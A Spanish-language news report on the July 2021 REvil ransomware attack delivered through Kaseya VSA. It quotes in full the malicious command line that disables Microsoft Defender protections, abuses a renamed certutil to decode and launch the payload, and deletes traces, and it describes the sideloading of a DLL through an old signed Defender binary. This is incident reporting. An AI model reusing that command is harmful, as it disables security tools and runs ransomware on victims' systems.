Ransomware afecta a varias empresas con Kaseya VSA

Durante la tarde del 2 de Julio del 2021, se han reportado varias empresas comprometidas con el ransomware perteneciente al grupo REvil gracias al software de administración de TI llamado Kaseya VSA

Kaseya es un popular proveedor de servicios administrados que brinda infraestructura de TI a varias empresas. VSA se encuentra entre los programas de software más populares del mundo para MSP (Proveedores de servicios gestionados) que brindan servicios de RMM (Monitoreo y administración remota). Durante las últimas horas emitió un aviso de seguridad advirtiendo a sus clientes que apaguen inmediatamente su servidor VSA para evitar la propagación del ataque.

Según John Hammond, todo empezó con una actualización llamada «Kaseya VSA Agent Hot-fix». Un PowerShell decodificaba un archivo «agent.crt» usando procesos legítimos de Windows «certutil.exe» y extraer el ejecutable «agent.exe» en la mismas carpeta «c:\kworking folder».

«C:\WINDOWS\system32\cmd.exe» /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Comando PowerShell que ejecuta el REvil Ransomware

El archivo «agent.exe» está firmado y usa un certificado de «PB03 TRANSPORT LTD» que incluye un «MsMpEng.exe» y «mpsvc.dll» que ejecuta el encriptador de REvil. Considerando que «MsMpEng.exe» es una versión antigua y legítima de Microsoft Defender usado para ejecutar el archivo DLL que encripta todo el equipo bajo un proceso de confianza.

Kaseya indicó que afectó principalmente a los clientes con el servicio on-premise, mientras que sus clientes SaaS nunca estuvieron en riesgo. Adicionalmente, han identificado la fuente de la vulnerabilidad y ya se encuentran preparando un parche para mitigar el incidente.

Más información:

• https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
• https://www.msspalert.com/cybersecurity-breaches-and-attacks/kaseya-rmm-cyberattack-warning/